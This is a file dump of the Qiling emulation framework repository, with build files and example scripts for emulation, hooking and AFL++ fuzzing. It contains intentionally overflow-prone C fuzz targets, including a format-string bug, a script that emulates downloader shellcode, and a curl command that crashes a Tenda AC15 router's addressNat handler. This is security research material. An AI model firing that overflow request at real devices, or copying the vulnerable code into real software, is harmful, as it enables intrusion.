secrets.pypi_pass }} 45 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # IDE left over 2 | .DS_Store 3 | .vscode 4 | .idea 5 | *.cache 6 | *.cache2 7 | .*.swp 8 | *.raw 9 | 10 | # test and logs 11 | tests/mac_test_elf.sh 12 | jexamples/ 13 | logs/ 14 | log/ 15 | test_qlog/ 16 | log_test/ 17 | qlog/ 18 | qlogs/ 19 | test_syscall_*.txt 20 | *.no.py 21 | .gitkeep 22 | test.file 23 | *.file 24 | *.qlog 25 | *.d 26 | *.o 27 | core 28 | *.perf 29 | tests/output.txt 30 | tests/testtest_* 31 | 32 | ### Python ### 33 | # Byte-compiled / optimized / DLL files 34 | __pycache__/ 35 | *.py[cod] 36 | 37 | # Distribution / packaging 38 | build/ 39 | develop-eggs/ 40 | dist/ 41 | eggs/ 42 | sdist/ 43 | wheels/ 44 | *.egg-info/ 45 | .installed.cfg 46 | *.egg 47 | MANIFEST 48 | 49 | # Environments 50 | .env 51 | .venv 52 | venv/ 53 | 54 | # mypy 55 | .mypy_cache/ 56 | .dmypy.json 57 | dmypy.json 58 | 59 | # Pyre type checker 60 | .pyre/ 61 | 62 | # pytype static type analyzer 63 | .pytype/ 64 | 65 | # Poetry local configuration file - https://python-poetry.org/docs/configuration/#local-configuration 66 | poetry.toml 67 | 68 | # ruff 69 | .ruff_cache/ 70 | 71 | # LSP config files 72 | pyrightconfig.json 73 | -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "examples/rootfs"] 2 | path = examples/rootfs 3 | url = https://github.com/qilingframework/rootfs.git 4 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3-slim AS base 2 | 3 | WORKDIR /qiling 4 | 5 | # hadolint global ignore=DL3008,DL3013 6 | ENV DEBIAN_FRONTEND=noninteractive 7 | ENV AM_I_IN_A_DOCKER_CONTAINER=True 8 | 9 | RUN apt-get update && apt-get -y upgrade && rm -rf /var/lib/apt/lists/* 10 | 11 | 12 | FROM base AS builder 13 | 14 | RUN apt-get update && apt-get install -y --no-install-recommends \ 15 | cmake build-essential gcc git \ 16 | && rm -rf /var/lib/apt/lists/* 17 | 18 | COPY pyproject.toml poetry.lock ./ 19 | RUN pip3 install --no-cache-dir poetry \ 20 | && poetry install --no-root --no-directory 21 | 22 | COPY . . 23 | RUN poetry install --only main && poetry build --format=wheel 24 | 25 | FROM base 26 | 27 | LABEL maintainer="Kevin Foo " 28 | 29 | COPY --from=builder /qiling /qiling 30 | 31 | WORKDIR /qiling 32 | 33 | RUN apt-get update \ 34 | && apt-get install -y --no-install-recommends unzip apt-utils \ 35 | && rm -rf /var/lib/apt/lists/* \ 36 | && pip3 install --no-deps --no-cache-dir dist/*.whl \ 37 | && rm -rf ./dist/ 38 | 39 | CMD ["bash"] 40 | -------------------------------------------------------------------------------- /TODO: -------------------------------------------------------------------------------- 1 | Features request and TODO please refer to issue 333 https://github.com/qilingframework/qiling/issues/333 2 | -------------------------------------------------------------------------------- /docs/API.md: -------------------------------------------------------------------------------- 1 | For latest documentation, please visit https://docs.qiling.io 2 | 3 | -------------------------------------------------------------------------------- /docs/DEMO.md: -------------------------------------------------------------------------------- 1 | For latest documentation, please visit https://docs.qiling.io 2 | 3 | -------------------------------------------------------------------------------- /docs/GDBSERVER-IDA.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/docs/GDBSERVER-IDA.png -------------------------------------------------------------------------------- /docs/GDBSERVER.md: -------------------------------------------------------------------------------- 1 | For latest documentation, please visit https://docs.qiling.io 2 | -------------------------------------------------------------------------------- /docs/README.md: -------------------------------------------------------------------------------- 1 | For latest documentation, please visit https://docs.qiling.io 2 | -------------------------------------------------------------------------------- /docs/SETUP.md: -------------------------------------------------------------------------------- 1 | For latest documentation, please visit https://docs.qiling.io 2 | -------------------------------------------------------------------------------- /docs/USAGE.md: -------------------------------------------------------------------------------- 1 | For latest documentation, please visit https://docs.qiling.io 2 | -------------------------------------------------------------------------------- /docs/bg_page.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/docs/bg_page.png -------------------------------------------------------------------------------- /docs/qiling1_logo_big.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/docs/qiling1_logo_big.png -------------------------------------------------------------------------------- /docs/qiling1_logo_small.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/docs/qiling1_logo_small.png -------------------------------------------------------------------------------- /docs/qiling2_logo_big.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/docs/qiling2_logo_big.png -------------------------------------------------------------------------------- /docs/qiling2_logo_small.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/docs/qiling2_logo_small.png -------------------------------------------------------------------------------- /examples/adcache_x86_windows_debug.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from zipfile import ZipFile 7 | 8 | import sys 9 | sys.path.append("..") 10 | 11 | from qiling import Qiling 12 | from qiling.const import QL_ARCH, QL_OS, QL_VERBOSE 13 | 14 | if __name__ == "__main__": 15 | with ZipFile("shellcodes/win32_https_download.zip") as zip_reader: 16 | with zip_reader.open('win32_https_download.bin', 'r', b'infected') as f: 17 | sc = f.read() 18 | 19 | ql = Qiling(code=sc, archtype=QL_ARCH.X86, ostype=QL_OS.WINDOWS, rootfs="rootfs/x86_windows", verbose=QL_VERBOSE.DEBUG) 20 | ql.run() 21 | -------------------------------------------------------------------------------- /examples/cachedlls_x8664_windows.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_VERBOSE 11 | 12 | if __name__ == "__main__": 13 | ql = Qiling(["rootfs/x8664_windows/bin/x8664_hello.exe"], "rootfs/x8664_windows", verbose=QL_VERBOSE.DEFAULT, libcache=True) 14 | ql.run() 15 | -------------------------------------------------------------------------------- /examples/crackme_x86_windows_unpatch.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | 11 | def force_call_dialog_func(ql: Qiling): 12 | # this hook is invoked after returning from DialogBoxParamA, so its 13 | # stack frame content is still available to us. 14 | 15 | # get DialogFunc address 16 | lpDialogFunc = ql.stack_read(-8) 17 | 18 | # setup stack for DialogFunc 19 | ql.stack_push(0) 20 | ql.stack_push(1001) 21 | ql.stack_push(273) 22 | ql.stack_push(0) 23 | ql.stack_push(0x0401018) 24 | 25 | # force EIP to DialogFunc 26 | ql.arch.regs.eip = lpDialogFunc 27 | 28 | def our_sandbox(path, rootfs): 29 | ql = Qiling(path, rootfs) 30 | 31 | # hook the instruction after returning from DialogBoxParamA 32 | ql.hook_address(force_call_dialog_func, 0x00401016) 33 | 34 | ql.run() 35 | 36 | if __name__ == "__main__": 37 | # Flag is : Ea5yR3versing 38 | our_sandbox(["rootfs/x86_windows/bin/Easy_CrackMe.exe"], "rootfs/x86_windows") 39 | -------------------------------------------------------------------------------- /examples/extensions/report/hello_x86_windows_json.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_VERBOSE 11 | from qiling.extensions.report import generate_report 12 | 13 | 14 | def my_sandbox(path, rootfs): 15 | ql = Qiling(path, rootfs, verbose=QL_VERBOSE.DEBUG) 16 | ql.run() 17 | my_json = generate_report(ql) # do something with the json 18 | print(generate_report(ql, pretty_print=True)) # or just print it to console 19 | 20 | 21 | if __name__ == "__main__": 22 | my_sandbox(["rootfs/x86_windows/bin/x86_hello.exe"], "rootfs/x86_windows") 23 | -------------------------------------------------------------------------------- /examples/extensions/trace/trace.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | from qiling.const import QL_VERBOSE 8 | from qiling.extensions import trace 9 | 10 | ROOTFS = r'examples/rootfs/x8664_linux' 11 | 12 | if __name__ == '__main__': 13 | # qiling verbosity should be set to DEBUG to show the trace records 14 | ql = Qiling([fr'{ROOTFS}/bin/x8664_hello'], ROOTFS, verbose=QL_VERBOSE.DEBUG) 15 | 16 | # enable full tracing. since full tracing significantly slows down the emulation, 17 | # it may be enabled on demand from a hook, instead 18 | trace.enable_full_trace(ql) 19 | 20 | # sometimes all we need is to see the last operations that led to a crash. the history 21 | # method uses less resources compared to full trace, and emits trace records only when 22 | # a crash occurs. 23 | # 24 | # for example, showing last 32 trace records before the crash: 25 | # trace.enable_history_trace(ql, 32) 26 | 27 | ql.run() 28 | -------------------------------------------------------------------------------- /examples/fuzzing/.gitignore: -------------------------------------------------------------------------------- 1 | afl_outputs 2 | AFLplusplus 3 | rootfs 4 | -------------------------------------------------------------------------------- /examples/fuzzing/dlink_dir815/afl_inputs/a: -------------------------------------------------------------------------------- 1 | A 2 | -------------------------------------------------------------------------------- /examples/fuzzing/dlink_dir815/dir815_mips32el_linux.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ ! -d ./AFLplusplus ]; then 4 | git clone https://github.com/AFLplusplus/AFLplusplus.git 5 | cd AFLplusplus 6 | make 7 | cd ./unicorn_mode 8 | ./build_unicorn_support.sh 9 | cd ../../ 10 | fi 11 | AFL_AUTORESUME=1 AFL_PATH="$(realpath ./AFLplusplus)" PATH="$AFL_PATH:$PATH" afl-fuzz -i afl_inputs -o afl_outputs -U -- python3 ./dir815_mips32el_linux.py @@ 12 | -------------------------------------------------------------------------------- /examples/fuzzing/linux_x8664/afl_inputs/a: -------------------------------------------------------------------------------- 1 | A -------------------------------------------------------------------------------- /examples/fuzzing/linux_x8664/fuzz.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // Program that will crash easily. 6 | #define SIZE (10) 7 | 8 | int fun(int i) 9 | { 10 | char *buf = malloc(SIZE); 11 | char buf2[SIZE]; 12 | 13 | while ((*buf = getc(stdin)) == 'A') 14 | { 15 | buf[i++] = *buf; 16 | } 17 | 18 | strncpy(buf2, buf, i); 19 | puts(buf2); 20 | 21 | return 0; 22 | } 23 | 24 | int main(int argc, char **argv) 25 | { 26 | return fun(argc); 27 | } 28 | -------------------------------------------------------------------------------- /examples/fuzzing/linux_x8664/fuzz.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/sh 2 | set -e 3 | 4 | # git clone https://github.com/AFLplusplus/AFLplusplus.git 5 | # cd AFLplusplus 6 | # make 7 | # cd ./unicorn_mode 8 | # ./build_unicorn_support.sh 9 | # cd ../../ 10 | # fi 11 | 12 | AFL_AUTORESUME=1 AFL_PATH="$(realpath ./AFLplusplus)" PATH="$AFL_PATH:$PATH" afl-fuzz -i afl_inputs -o afl_outputs -U -- python3 ./fuzz_x8664_linux.py @@ 13 | -------------------------------------------------------------------------------- /examples/fuzzing/linux_x8664/qilingfzz.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/examples/fuzzing/linux_x8664/qilingfzz.png -------------------------------------------------------------------------------- /examples/fuzzing/linux_x8664/x8664_fuzz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/examples/fuzzing/linux_x8664/x8664_fuzz -------------------------------------------------------------------------------- /examples/fuzzing/qnx_arm/README.md: -------------------------------------------------------------------------------- 1 | See [Linux binary fuzzing with AFLplusplus](../linux_x8664/README.md) for details. This is a QNX port of the same example. 2 | -------------------------------------------------------------------------------- /examples/fuzzing/qnx_arm/afl_inputs/a: -------------------------------------------------------------------------------- 1 | A -------------------------------------------------------------------------------- /examples/fuzzing/qnx_arm/arm_fuzz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/examples/fuzzing/qnx_arm/arm_fuzz -------------------------------------------------------------------------------- /examples/fuzzing/qnx_arm/fuzz.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // Program that will crash easily. 6 | #define SIZE (10) 7 | 8 | int fun(int i) { 9 | char *buf = malloc(SIZE); 10 | char buf2[SIZE]; 11 | while (*buf = getc(stdin) == 'A') { 12 | buf[i++] = *buf; 13 | } 14 | strncpy(buf2, buf, i); 15 | printf(buf2); 16 | return 0; 17 | } 18 | 19 | int main(int argc, char **argv) { 20 | return fun(argc); 21 | } 22 | -------------------------------------------------------------------------------- /examples/fuzzing/qnx_arm/fuzz.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | set -e 3 | if [[ ! -d ./AFLplusplus ]]; then 4 | git clone https://github.com/AFLplusplus/AFLplusplus.git 5 | cd AFLplusplus 6 | make 7 | cd ./unicorn_mode 8 | ./build_unicorn_support.sh 9 | cd ../../ 10 | fi 11 | AFL_AUTORESUME=1 AFL_PATH="$(realpath ./AFLplusplus)" PATH="$AFL_PATH:$PATH" afl-fuzz -i afl_inputs -o afl_outputs -U -- python3 ./fuzz_arm_qnx.py @@ 12 | -------------------------------------------------------------------------------- /examples/fuzzing/rt_n12_b1/http-input/1: -------------------------------------------------------------------------------- 1 | GET /www/FUZZME HTTP/1.1 2 | Host: 127.0.0.1:9000 3 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0 4 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 5 | Accept-Language: en-US,en;q=0.5 6 | Accept-Encoding: gzip, deflate, br 7 | DNT: 1 8 | Sec-GPC: 1 9 | Connection: keep-alive 10 | Upgrade-Insecure-Requests: 1 11 | Sec-Fetch-Dest: document 12 | Sec-Fetch-Mode: navigate 13 | Sec-Fetch-Site: none 14 | Sec-Fetch-User: ?1 15 | Priority: u=1 16 | 17 | -------------------------------------------------------------------------------- /examples/fuzzing/rt_n12_b1/http-input/2: -------------------------------------------------------------------------------- 1 | POST /www/FUZZME HTTP/1.1 2 | Host: 127.0.0.1:9000 3 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0 4 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 5 | Accept-Language: en-US,en;q=0.5 6 | Accept-Encoding: gzip, deflate, br 7 | DNT: 1 8 | Sec-GPC: 1 9 | Connection: keep-alive 10 | Upgrade-Insecure-Requests: 1 11 | Sec-Fetch-Dest: document 12 | Sec-Fetch-Mode: navigate 13 | Sec-Fetch-Site: none 14 | Sec-Fetch-User: ?1 15 | Priority: u=1 16 | Content-Type: application/x-www-form-urlencoded 17 | Content-Length: 0 18 | 19 | -------------------------------------------------------------------------------- /examples/fuzzing/rt_n12_b1/http-input/3: -------------------------------------------------------------------------------- 1 | HEAD /www/FUZZME HTTP/1.1 2 | Host: 127.0.0.1:9000 3 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0 4 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 5 | Accept-Language: en-US,en;q=0.5 6 | Accept-Encoding: gzip, deflate, br 7 | DNT: 1 8 | Sec-GPC: 1 9 | Connection: keep-alive 10 | Upgrade-Insecure-Requests: 1 11 | Sec-Fetch-Dest: document 12 | Sec-Fetch-Mode: navigate 13 | Sec-Fetch-Site: none 14 | Sec-Fetch-User: ?1 15 | Priority: u=1 16 | 17 | -------------------------------------------------------------------------------- /examples/fuzzing/rt_n12_b1/http-input/4: -------------------------------------------------------------------------------- 1 | OPTIONS /www/FUZZME HTTP/1.1 2 | Host: 127.0.0.1:9000 3 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0 4 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 5 | Accept-Language: en-US,en;q=0.5 6 | Accept-Encoding: gzip, deflate, br 7 | DNT: 1 8 | Sec-GPC: 1 9 | Connection: keep-alive 10 | Upgrade-Insecure-Requests: 1 11 | Sec-Fetch-Dest: document 12 | Sec-Fetch-Mode: navigate 13 | Sec-Fetch-Site: none 14 | Sec-Fetch-User: ?1 15 | Priority: u=1 16 | 17 | -------------------------------------------------------------------------------- /examples/fuzzing/stm32f429/afl_inputs/sample: -------------------------------------------------------------------------------- 1 | hackme 2 | aaaaaaaaaaaa 3 | -------------------------------------------------------------------------------- /examples/fuzzing/stm32f429/fuzz.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | AFL_AUTORESUME=1 afl-fuzz -i afl_inputs -o afl_outputs -U -- python3 ./fuzz.py @@ 3 | -------------------------------------------------------------------------------- /examples/fuzzing/tenda_ac15/README.md: -------------------------------------------------------------------------------- 1 | #### Learn how to build fuzzer from 1 day 2 | 3 | - Target AC15 4 | - Install Aflplusplus 5 | - run ./saver_tendaac15_httpd.py 6 | - run ./addressNat_overflow.sh to crash to generate snapshot.bin 7 | - start fuzzing with fuzz_tendaac15_httpd.sh 8 | 9 | -------------------------------------------------------------------------------- /examples/fuzzing/tenda_ac15/addressNat_overflow.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | curl -v -H "X-Requested-With: XMLHttpRequest" -b "password=1234" -e http://localhost:8080/samba.html -H "Content-Type:application/x-www-form-urlencoded" --data "entrys=sync" --data "page=CCCCAAAA" http://localhost:8080/goform/addressNat 4 | 5 | 6 | -------------------------------------------------------------------------------- /examples/fuzzing/tenda_ac15/afl_inputs/a: -------------------------------------------------------------------------------- 1 | a 2 | -------------------------------------------------------------------------------- /examples/fuzzing/tenda_ac15/fuzz_tendaac15_httpd.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/sh 2 | 3 | AFL_DEBUG_CHILD_OUTPUT=1 AFL_AUTORESUME=1 AFL_PATH="$(realpath ./AFLplusplus)" PATH="$AFL_PATH:$PATH" ./AFLplusplus/afl-fuzz -i afl_inputs -o afl_outputs -U -- python3 ./fuzz_tendaac15_httpd.py @@ 4 | -------------------------------------------------------------------------------- /examples/hello_8086_dos.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_VERBOSE 11 | 12 | if __name__ == "__main__": 13 | ql = Qiling(["rootfs/8086/dos/HI.DOS_COM"], "rootfs/8086/dos", verbose=QL_VERBOSE.DEFAULT) 14 | ql.run() 15 | -------------------------------------------------------------------------------- /examples/hello_arm_linux_debug.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_VERBOSE 11 | 12 | if __name__ == "__main__": 13 | ql = Qiling([r'rootfs/arm_linux/bin/arm_hello'], r'rootfs/arm_linux', verbose=QL_VERBOSE.DEBUG) 14 | 15 | ql.debugger = "qdb" # enable qdb without options 16 | 17 | # other possible alternatives: 18 | # ql.debugger = "qdb::rr" # switch on record and replay with rr 19 | # ql.debugger = "qdb:0x1030c" # enable qdb and setup breakpoin at 0x1030c 20 | 21 | ql.run() 22 | -------------------------------------------------------------------------------- /examples/hello_arm_qnx.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | 11 | if __name__ == "__main__": 12 | ql = Qiling(["rootfs/arm_qnx/bin/hello_static"], "rootfs/arm_qnx") 13 | ql.run() 14 | -------------------------------------------------------------------------------- /examples/hello_arm_qnx_customapi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_INTERCEPT, QL_CALL_BLOCK 11 | from qiling.os.const import STRING 12 | 13 | def my_puts_onenter(ql: Qiling): 14 | params = ql.os.resolve_fcall_params({'s': STRING}) 15 | 16 | print(f'puts("{params["s"]}")') 17 | 18 | return QL_CALL_BLOCK 19 | 20 | def my_printf_onenter(ql: Qiling): 21 | params = ql.os.resolve_fcall_params({'s': STRING}) 22 | 23 | print(f'printf("{params["s"]}")') 24 | 25 | return QL_CALL_BLOCK 26 | 27 | def my_puts_onexit(ql: Qiling): 28 | print(f'after puts') 29 | 30 | return QL_CALL_BLOCK 31 | 32 | if __name__ == "__main__": 33 | ql = Qiling(["rootfs/arm_qnx/bin/hello_static"], "rootfs/arm_qnx") 34 | ql.os.set_api('puts', my_puts_onenter, QL_INTERCEPT.ENTER) 35 | ql.os.set_api('printf', my_printf_onenter, QL_INTERCEPT.ENTER) 36 | ql.os.set_api('puts', my_puts_onexit, QL_INTERCEPT.EXIT) 37 | ql.run() 38 | -------------------------------------------------------------------------------- /examples/hello_arm_set_filter.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | 11 | if __name__ == "__main__": 12 | ql = Qiling(["rootfs/arm_linux/bin/arm_hello"], "rootfs/arm_linux") 13 | ql.filter = r"^open" 14 | ql.run() 15 | -------------------------------------------------------------------------------- /examples/hello_linuxx8664_intercept.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_INTERCEPT 11 | from qiling.os.linux.syscall_nums import SYSCALL_NR 12 | 13 | def write_onenter(ql: Qiling, fd: int, buf: int, count: int): 14 | print("enter write syscall!") 15 | 16 | ql.arch.regs.rsi = buf + 1 17 | ql.arch.regs.rdx = count - 1 18 | 19 | def write_onexit(ql: Qiling, fd: int, buf: int, count: int, retval: int): 20 | print("exit write syscall!") 21 | 22 | ql.arch.regs.rax = count + 1 23 | 24 | if __name__ == "__main__": 25 | ql = Qiling(["rootfs/x8664_linux/bin/x8664_hello"], "rootfs/x8664_linux") 26 | 27 | ql.os.set_syscall(SYSCALL_NR.write, write_onenter, QL_INTERCEPT.ENTER) 28 | ql.os.set_syscall(SYSCALL_NR.write, write_onexit, QL_INTERCEPT.EXIT) 29 | 30 | ql.run() 31 | -------------------------------------------------------------------------------- /examples/hello_mips32_linux_customapi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | from qiling.os.const import STRING 11 | from qiling.const import QL_VERBOSE 12 | 13 | def my_puts(ql: Qiling): 14 | params = ql.os.resolve_fcall_params({'s': STRING}) 15 | 16 | print(f'puts("{params["s"]}")') 17 | 18 | if __name__ == "__main__": 19 | ql = Qiling(["rootfs/mips32_linux/bin/mips32_hello"], "rootfs/mips32_linux", verbose=QL_VERBOSE.DEBUG) 20 | ql.os.set_api("puts", my_puts) 21 | ql.run() 22 | -------------------------------------------------------------------------------- /examples/hello_mips32el_linux_debug.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_VERBOSE 11 | 12 | if __name__ == "__main__": 13 | ql = Qiling(["rootfs/mips32el_linux/bin/mips32el_hello_static"], "rootfs/mips32el_linux", verbose=QL_VERBOSE.DEBUG) 14 | ql.run() 15 | -------------------------------------------------------------------------------- /examples/hello_mips32el_linux_function_hook.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_INTERCEPT, QL_CALL_BLOCK, QL_VERBOSE 11 | from qiling.os.const import STRING 12 | 13 | def my_puts_onenter(ql: Qiling): 14 | params = ql.os.resolve_fcall_params({'s': STRING}) 15 | 16 | print(f'puts("{params["s"]}")') 17 | return QL_CALL_BLOCK 18 | 19 | def my_puts_onexit(ql: Qiling): 20 | print(f'after puts') 21 | return QL_CALL_BLOCK 22 | 23 | if __name__ == "__main__": 24 | ql = Qiling(["rootfs/mips32el_linux/bin/mips32el_double_hello"], "rootfs/mips32el_linux", verbose=QL_VERBOSE.DEBUG) 25 | 26 | ql.os.set_api('puts', my_puts_onenter, QL_INTERCEPT.ENTER) 27 | ql.os.set_api('puts', my_puts_onexit, QL_INTERCEPT.EXIT) 28 | 29 | ql.run() 30 | -------------------------------------------------------------------------------- /examples/hello_x8664_gdb_macos.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_VERBOSE 11 | 12 | if __name__ == "__main__": 13 | ql = Qiling(["rootfs/x8664_linux/bin/x8664_hello"], "rootfs/x8664_linux", verbose=QL_VERBOSE.DEBUG) 14 | ql.debugger = "gdb:0.0.0.0:9999" 15 | ql.run() 16 | -------------------------------------------------------------------------------- /examples/hello_x8664_linux_customapi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | import sys 6 | sys.path.append("..") 7 | 8 | from qiling import Qiling 9 | from qiling.os.const import STRING 10 | from qiling.const import QL_VERBOSE 11 | 12 | def my_puts(ql: Qiling): 13 | params = ql.os.resolve_fcall_params({'s': STRING}) 14 | 15 | print(f'puts("{params["s"]}")') 16 | 17 | if __name__ == "__main__": 18 | ql = Qiling(["rootfs/x8664_linux/bin/x8664_hello"], "rootfs/x8664_linux", verbose=QL_VERBOSE.DEBUG) 19 | ql.os.set_api('puts', my_puts) 20 | ql.run() 21 | -------------------------------------------------------------------------------- /examples/hello_x8664_linux_part_exec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_VERBOSE 11 | 12 | if __name__ == "__main__": 13 | def dump(ql, *args, **kw): 14 | ql.save(reg=False, cpu_context=True, snapshot="/tmp/snapshot.bin") 15 | ql.emu_stop() 16 | 17 | ql = Qiling(["rootfs/x8664_linux/bin/sleep_hello"], "rootfs/x8664_linux", verbose=QL_VERBOSE.DEBUG) 18 | X64BASE = int(ql.profile.get("OS64", "load_address"), 16) 19 | ql.hook_address(dump, X64BASE + 0x1094) 20 | ql.run() 21 | 22 | ql = Qiling(["rootfs/x8664_linux/bin/sleep_hello"], "rootfs/x8664_linux", verbose=QL_VERBOSE.DISASM) 23 | # load base address from profile file 24 | X64BASE = int(ql.profile.get("OS64", "load_address"), 16) 25 | ql.restore(snapshot="/tmp/snapshot.bin") 26 | # set execution starting and ending points 27 | begin_point = X64BASE + 0x109e 28 | end_point = X64BASE + 0x10bc 29 | ql.run(begin = begin_point, end = end_point) -------------------------------------------------------------------------------- /examples/hello_x8664_macos.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_VERBOSE 11 | 12 | if __name__ == "__main__": 13 | ql = Qiling(["rootfs/x8664_macos/bin/x8664_hello"], "rootfs/x8664_macos", verbose=QL_VERBOSE.DEBUG) 14 | ql.run() 15 | -------------------------------------------------------------------------------- /examples/hello_x86_linux_fake_urandom.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from sys import path 7 | path.append('..') 8 | 9 | from qiling import Qiling 10 | from qiling.os.mapper import QlFsMappedObject 11 | 12 | class Fake_urandom(QlFsMappedObject): 13 | 14 | def read(self, size): 15 | return b"\x01" # fixed value for reading /dev/urandom 16 | 17 | def fstat(self): # 